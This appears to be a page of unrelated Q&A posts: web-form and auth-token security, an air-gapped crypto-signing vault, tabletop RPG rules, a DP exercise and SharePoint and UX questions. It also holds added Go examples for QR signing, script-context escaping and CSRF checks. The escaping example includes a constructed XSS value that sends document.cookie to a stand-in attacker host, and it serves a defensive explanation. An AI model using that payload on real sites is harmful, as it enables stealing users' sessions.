What security concerns are there regarding website users inputting personal financial data without putting in personally identifying data?

I am a web developer, but I have only a rudimentary grasp of security, e.g., be careful to sanitize inputs, store as little user data as possible, encrypt passwords, keep up with security issues of libraries and packages, etc.

Today, I was approached by a client who does financial planning about replacing a spreadsheet he gives clients with a web-based form. The spreadsheet asks users to input certain financial data – e.g., current value of various investment accounts, business interests, etc. These numbers are put into a formula and a value is generated which is supposed to help the user decide whether the consulting could be useful to them.

The phone call was very short, and my questions focused on more mundane matters about user experience, desired UI elements, etc. No commitments have been made, and I’m analyzing the project to see if it’s something I can do. I began to think about potential security issues, and I realized I really don’t know where to start. So far it seems that the client wants the form to be accessed via a magic link, and that the user would not enter any personally identifying information. I do not know yet whether my potential client wants to store the value generated, a simple dollar amount which is the ‘benefit’ the user could get by using the service. The impression I got is that my potential client simply wants to use this value as a motivator for clients to inquire further about his services.

My question is this: In this scenario, what security-related matters should I consider?

Thank you.

Putting together an air-gap ephemeral linux OS to run off RAM

Idea: Have an operating system boot from a bootable medium completely into RAM. There is no storage attached to this system, so once it boots up and we eject the bootable medium, this system is completely running off RAM, and it’s not capable of leaving a trace anywhere except RAM, the contents of which are hard to recover without physical access to the system.

Premises: There is no physical access to this system, which makes a whole set of attacks possible, but let’s compile a list of attacks, like cold boot attacks etc., that pose a threat to this setup, and we can assess the severity of each one of them.

Use-case: Using as a vault for cryptocurrency storage & signing transactions.

Stack:

  • Hardware: Raspberry Pi / old computer (which may or may not have Wi-Fi/Bluetooth hardware available; the latter obviously preferred)
  • Custom Linux OS (Functional Display + Touchscreen drivers + Camera drivers + Absence of WiFi / Bluetooth drivers + Modern Browser + On-screen keyboard)
  • Binary (Golang program running a local server & UI accessed via browser)

Things that may or may not matter:

  • CPU architecture: x86 / ARM
  • Bootable media: USB drive / SD card

Communication medium with air-gap system: QR codes

Since this only requires a little information to be passed to and fro, using QR codes to encode/decode a JSON payload seems ideal.

Explanation: Boot up the computer and eject the bootable medium. Run the program and access the UI in a browser by going to localhost:3000. Generate the keys (sensitive information), or import them if you already have keys generated in a previous run. Scan a QR code to receive the unsigned transaction, show a confirmation, sign it, and then encode the signed transaction as a QR code and display it.

The bootable medium that’s in use will never be plugged back into a system connected to the internet, as an additional security measure, but the ability to eject the bootable medium after boot-up makes this unnecessary.

Building Custom Linux OS: This is where I want to crowd source knowledge:

  • What OS to choose to build upon + what packages to use + what packages to remove?
  • What would be a simpler approach to building this OS?
  • How to build a lean and minimal distro which can run on a system with as little as 512 MB RAM (the less the better), provided the OS footprint is around 100-20 MB of RAM, leaving the rest for the program to use.
  • Expose attack vectors in this approach.

End Goal: Present the source code + instructions and host the distro for download, to use as a cryptocurrency vault along with the wallet app, which will be open-sourced with the option of choosing a hosted service for that as well. Considering the architecture, people can simply use it without even needing to trust/verify the system, as long as they can maintain the air gap of the vault.
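The scan-confirm-sign-display loop described in the post, as an added example that is not the poster's code or the project's wallet app. It assumes Ed25519 signatures and an illustrative transaction schema (to, amount, nonce); a real chain dictates both. The point worth taking from it is on the air-gapped side: the signer rejects any field it does not display, and it signs the re-serialised form of exactly the struct it showed on screen, so the confirmation and the signed bytes cannot diverge.

```go
// Added example (not the poster's code): the QR-carried JSON exchange between
// the online wallet and the air-gapped signer. Ed25519 and the UnsignedTx
// field set are this example's assumptions, not any real chain's format.
package main

import (
	"bytes"
	"crypto/ed25519"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// UnsignedTx is the payload the online side encodes into a QR code.
type UnsignedTx struct {
	To     string `json:"to"`
	Amount uint64 `json:"amount"`
	Nonce  uint64 `json:"nonce"`
}

// SignedTx is what the vault displays as a QR code for the online side to broadcast.
type SignedTx struct {
	Tx        UnsignedTx `json:"tx"`
	PubKey    string     `json:"pubkey"`    // hex
	Signature string     `json:"signature"` // hex, over json.Marshal(Tx)
}

// DemoKey derives a fixed key from a constant seed so the example is reproducible;
// on the vault the seed would come from the OS CSPRNG or an imported backup.
func DemoKey() ed25519.PrivateKey {
	return ed25519.NewKeyFromSeed(bytes.Repeat([]byte{0x42}, ed25519.SeedSize))
}

// parseUnsigned rejects payloads that do not match the schema exactly. On an
// air-gapped signer a field the UI does not display must never be signed silently.
func parseUnsigned(payload []byte) (UnsignedTx, error) {
	dec := json.NewDecoder(bytes.NewReader(payload))
	dec.DisallowUnknownFields()
	var tx UnsignedTx
	if err := dec.Decode(&tx); err != nil {
		return UnsignedTx{}, err
	}
	if dec.More() {
		return UnsignedTx{}, errors.New("trailing data after transaction")
	}
	if tx.To == "" || tx.Amount == 0 {
		return UnsignedTx{}, errors.New("missing recipient or zero amount")
	}
	return tx, nil
}

// Confirmation is the text shown on the vault before signing; the signed bytes
// are re-serialised from the same struct, so what is shown is what is signed.
func Confirmation(tx UnsignedTx) string {
	return fmt.Sprintf("Send %d to %s (nonce %d)?", tx.Amount, tx.To, tx.Nonce)
}

// SignPayload runs on the air-gapped side: scan -> parse -> confirm -> sign -> encode.
func SignPayload(priv ed25519.PrivateKey, payload []byte) ([]byte, error) {
	tx, err := parseUnsigned(payload)
	if err != nil {
		return nil, err
	}
	canonical, _ := json.Marshal(tx) // struct field order makes this deterministic
	sig := ed25519.Sign(priv, canonical)
	pub := priv.Public().(ed25519.PublicKey)
	return json.Marshal(SignedTx{Tx: tx, PubKey: hex.EncodeToString(pub), Signature: hex.EncodeToString(sig)})
}

// VerifyPayload runs on the online side after scanning the vault's QR code.
func VerifyPayload(signed []byte) (SignedTx, error) {
	var s SignedTx
	if err := json.Unmarshal(signed, &s); err != nil {
		return SignedTx{}, err
	}
	pub, err := hex.DecodeString(s.PubKey)
	if err != nil || len(pub) != ed25519.PublicKeySize {
		return SignedTx{}, errors.New("bad public key")
	}
	sig, err := hex.DecodeString(s.Signature)
	if err != nil {
		return SignedTx{}, err
	}
	canonical, _ := json.Marshal(s.Tx)
	if !ed25519.Verify(ed25519.PublicKey(pub), canonical, sig) {
		return SignedTx{}, errors.New("signature does not verify")
	}
	return s, nil
}

func main() {
	priv := DemoKey()
	// Constructed sample payload, as the online wallet would encode it into a QR code.
	signed, err := SignPayload(priv, []byte(`{"to":"addr1","amount":1500,"nonce":7}`))
	if err != nil {
		panic(err)
	}
	fmt.Println(string(signed))
	if _, err := VerifyPayload(signed); err != nil {
		panic(err)
	}
	// A payload smuggling a field the screen would not show is refused.
	_, err = SignPayload(priv, []byte(`{"to":"addr1","amount":1500,"nonce":7,"fee":999999}`))
	fmt.Println("extra field:", err)
}
```

QR encoding and decoding of the JSON bytes is left to whatever QR library the vault uses; everything above is the payload logic between the two scans.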

How much time does putting an item inside a Bag of Holding take when you are fighting?

In the Bag of Holding’s (Dungeon Master’s Guide, p. 248) description it is stated:

Retrieving a specific item from a bag of holding is a move action — unless the bag contains more than an ordinary backpack would hold, in which case retrieving a specific item is a full-round action.

I am wondering how much time is required to put an item inside the bag while you are engaged in a combat encounter. Should it be considered as a move action as well? Should it be a free action if the item is small enough?

I have found this question that is almost the same as this one: How long does it take to place an item in a Bag of Holding or Portable Hole?

The only thing that has not been made clear is: does the item’s size influence the time I must spend to put something inside the bag?

Ex: Does a rod take more time than a ring? What about a halberd and a sword?

Putting Blocks in Boxes Until the Height Is Met Using Dynamic Programming

I am pretty new to the field of DP. My friend recently gave me a question from one of his old assignments to solve for practice, and I am stuck on it.

The question says:

Given n blocks of the same height and width but different thickness, and a list B = (b_1, . . . , b_n) of the thicknesses of the blocks, define a DP algorithm to fit all the blocks in k boxes, where each box can fit at most t thickness of blocks.

I was thinking of putting as many blocks as possible in the first 2 boxes, and the third one will be filled with the leftover blocks. But I have no idea how to break it down into subproblems and create the base cases to define the time required. Any help will be appreciated. The given time complexity is O(nt^2).

Thanks!

If someone is under the effect of microcosm, does putting the physical body in quintessence affect their dream world?

Does putting someone’s physical body in quintessence, thus removing them from the time stream, also remove them from the dream demiplane their mind was sent to by Microcosm?

The point of this is to see if we can separate the mind and body and use Dream Travel to go to the dream created by Microcosm, with the body of the dreamer safely stored in Quintessence.

All of this assumes that Microcosm does create a dream demiplane, which by RAW may be dubious. But if it does, it is a cheap pocket plane with better time traits than we could otherwise get. Downside: dealing with the monsters of the dream world might suck. Upside: it is pretty hard to get there if you’re not a creature related to dreams.

Is putting authentication tokens inside the HTML body safe?

I have a project, a webapp/website that uses cookies to authenticate users with long randomly generated strings (also with SameSite=Lax, HttpOnly, Secure); however, I also have an API which itself needs authentication tokens.

My current design is this: when the website server authenticates the user, it generates the API authToken and injects it along with the total initial state of the page, and then the API requests are served with this authToken. Is this flow inherently flawed? I thought of using an extra HTTP request after page load to get the API authToken and thus avoid putting it inside the HTML body, but that means more slowness, since the page contents usually depend on the API requests, which would need an extra HTTP request after the page load to get the API authToken. I assume the connection is already over HTTPS, of course.
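Whatever the answer on where the token should live, the injection step the post describes has one mechanical hazard of its own: anything serialised into a `<script>` block must be escaped for that context, or user-controlled state (a display name, a comment) can close the tag and run script on a page that now also holds the API token. The following is an added example, not the poster's code; it uses Go's html/template, whose contextual escaper JSON-encodes values inside `<script>` and escapes `<`, `>`, `&`, U+2028 and U+2029, beside text/template, which copies the caller's serialisation through untouched. The template and the PageState fields are this example's own.

```go
// Added example (not the poster's code): injecting initial page state plus an API
// token into HTML. html/template escapes for the <script> context; text/template
// does not, which is the failure case shown second.
package main

import (
	"bytes"
	"fmt"
	htmltemplate "html/template"
	texttemplate "text/template"
)

// page is the same template source for both engines: the state goes into one
// script block and nothing else.
const page = `<!doctype html><script>window.__STATE__ = {{.}};</script>`

// PageState is what the server injects after it has authenticated the user.
type PageState struct {
	APIToken string `json:"apiToken"`
	Profile  string `json:"profile"` // user-controlled, e.g. a display name
}

// RenderSafe uses html/template. In a <script> context it JSON-encodes the value
// with '<', '>' and '&' as \u003c, \u003e, \u0026, so the data cannot close the tag.
func RenderSafe(s PageState) (string, error) {
	t, err := htmltemplate.New("page").Parse(page)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, s); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// RenderUnsafe uses text/template with a string the caller already serialised.
// No contextual escaping happens, so a profile containing "</script>" breaks out
// of the script block. Kept only to show the failure.
func RenderUnsafe(serialised string) (string, error) {
	t, err := texttemplate.New("page").Parse(page)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, serialised); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	// Constructed sample: a display name chosen by an attacker.
	s := PageState{
		APIToken: "tok_demo",
		Profile:  `</script><script>fetch("//evil.example/?c="+document.cookie)</script>`,
	}
	safe, _ := RenderSafe(s)
	fmt.Println(safe)
	leaky, _ := RenderUnsafe(fmt.Sprintf(`{"apiToken":%q,"profile":%q}`, s.APIToken, s.Profile))
	fmt.Println(leaky)
}
```

The same rule applies in any other stack: serialise with a JSON encoder that escapes the HTML-significant characters, or write the state into a non-executed element (for example a `<script type="application/json">` block read with `JSON.parse`) with the same escaping.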

Are the trade-offs for putting an auth token in an HTTP-only cookie for an SPA worth it?

I’ve been building a web app (Rails API + React SPA) for learning / fun and have been researching authentication. The most commonly recommended approach for authenticating SPAs that I have read is to put the auth token (such as a JWT) in a secure HTTP-only cookie to protect it from XSS. This seems to have a couple of consequences:

  • We now have to handle CSRF since we are using cookie authentication
  • Since it’s an SPA we can’t protect against CSRF until the user is logged in, which means we are vulnerable to a login phishing attack (https://stackoverflow.com/questions/6412813/do-login-forms-need-tokens-against-csrf-attacks)

But what is the real downside to just storing the auth token in browser storage (i.e. session storage)? XSS becomes slightly more convenient for the attacker? Even with an HTTP-only cookie the attacker can still use the auth token by making requests directly from the site, because if there’s an XSS vulnerability then they don’t need to be able to read the token to use it.

It seems that the popular recommendation just makes things more complicated, since we now have to protect against CSRF, only to make things a little more difficult for the attacker in the case of XSS. Due to the amount of resources making these recommendations I feel like I am missing something, and would appreciate any feedback or clarifications!

Here are a couple of sources I’ve been reading that have been quite adamant against browser storage for auth tokens:

  • https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html
  • https://jwt.io/introduction/
  • https://auth0.com/docs/security/store-tokens
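The CSRF handling that cookie authentication obliges an SPA backend to do, as an added example that is not the poster's code (the poster's stack is Rails; this is Go's net/http, and the cookie name, header name and origin are this example's own choices). It layers two independent checks on every state-changing request: the browser-set Origin header (with a Referer fallback) must name the application's own origin, and a double-submit token that the SPA copies from a readable cookie into a request header must match. The double-submit cookie can be issued on the first GET, before any login, which is the pre-session token the OWASP cheat sheet describes for covering the login request itself.

```go
// Added example (not the poster's code): CSRF checks for a cookie-authenticated
// SPA backend, as a net/http middleware. Names of the cookie, header and origin
// are this example's assumptions.
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/url"
)

const (
	csrfCookie = "csrf"         // double-submit cookie, readable by the SPA (not HttpOnly)
	csrfHeader = "X-CSRF-Token" // the SPA copies the cookie value here on unsafe requests
)

// IssueCSRFCookie sets the double-submit cookie. It can be issued on the first
// GET, before login, so the login POST itself is covered (a pre-session token).
func IssueCSRFCookie(w http.ResponseWriter) (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	tok := hex.EncodeToString(b)
	http.SetCookie(w, &http.Cookie{
		Name: csrfCookie, Value: tok, Path: "/",
		Secure: true, SameSite: http.SameSiteStrictMode, // HttpOnly deliberately false
	})
	return tok, nil
}

// CSRFCheck returns ("", true) when the request may proceed, or a reason otherwise.
// Two independent checks: the Origin (or Referer) must be our own origin, and the
// header must echo the cookie. A missing Origin and Referer fails closed.
func CSRFCheck(r *http.Request, allowedOrigin string) (string, bool) {
	switch r.Method {
	case http.MethodGet, http.MethodHead, http.MethodOptions:
		return "", true // safe methods must have no side effects
	}
	src := r.Header.Get("Origin")
	if src == "" {
		if u, err := url.Parse(r.Referer()); err == nil && u.Host != "" {
			src = u.Scheme + "://" + u.Host
		}
	}
	if src != allowedOrigin {
		return "origin mismatch: " + src, false
	}
	c, err := r.Cookie(csrfCookie)
	if err != nil || c.Value == "" {
		return "csrf cookie missing", false
	}
	h := r.Header.Get(csrfHeader)
	if subtle.ConstantTimeCompare([]byte(c.Value), []byte(h)) != 1 {
		return "csrf token mismatch", false
	}
	return "", true
}

// Protect wraps an API handler with the check.
func Protect(allowedOrigin string, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if reason, ok := CSRFCheck(r, allowedOrigin); !ok {
			http.Error(w, "forbidden: "+reason, http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	// Constructed requests: one from the SPA, one forged from another site. The
	// browser attaches the cookie to both; only the SPA can also set the header.
	good, _ := http.NewRequest(http.MethodPost, "https://app.example/api/transfer", nil)
	good.Header.Set("Origin", "https://app.example")
	good.AddCookie(&http.Cookie{Name: csrfCookie, Value: "abc123"})
	good.Header.Set(csrfHeader, "abc123")
	fmt.Println(CSRFCheck(good, "https://app.example"))

	forged, _ := http.NewRequest(http.MethodPost, "https://app.example/api/transfer", nil)
	forged.Header.Set("Origin", "https://evil.example")
	forged.AddCookie(&http.Cookie{Name: csrfCookie, Value: "abc123"})
	fmt.Println(CSRFCheck(forged, "https://app.example"))
}
```

SameSite=Lax or Strict on the session cookie is a third layer on top of this, not a replacement: it depends on browser support and on every endpoint honouring the safe-method contract the switch statement assumes.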

Putting a multiple choice checkbox in a workflow in Sharepoint Designer 2013

I have a column in my SP which asks if 3 things are done, with a checkbox for each. Once all 3 are checked as being done, I’d like an email sent to certain people in my workflow. I don’t understand how to get the checkbox options to be in the workflow. I’m sorry, I’m not sure how else to word this, but I’ll be happy to try to clarify if I’m not being clear.

I need this column to relate to my workflow here, but I only see Yes/No options in the value If/Then statements.

How do you encourage deletion of something without putting the user off?

Scenario: A manager has access to her team members’ data on an internal system. She also has access to certain team members who have since moved to another role or under another manager.

We want the managers to keep their employee roster up to date, so it would be helpful if these managers “deleted” people they are no longer responsible for.

Through testing I received feedback that this remove feature was ignored because they don’t want to mess up the database. The problem is the database is a mess because we have duplicates and crossed wires, so we need the managers to use this remove feature. So my question is: how can I improve this component to actively encourage data cleansing?
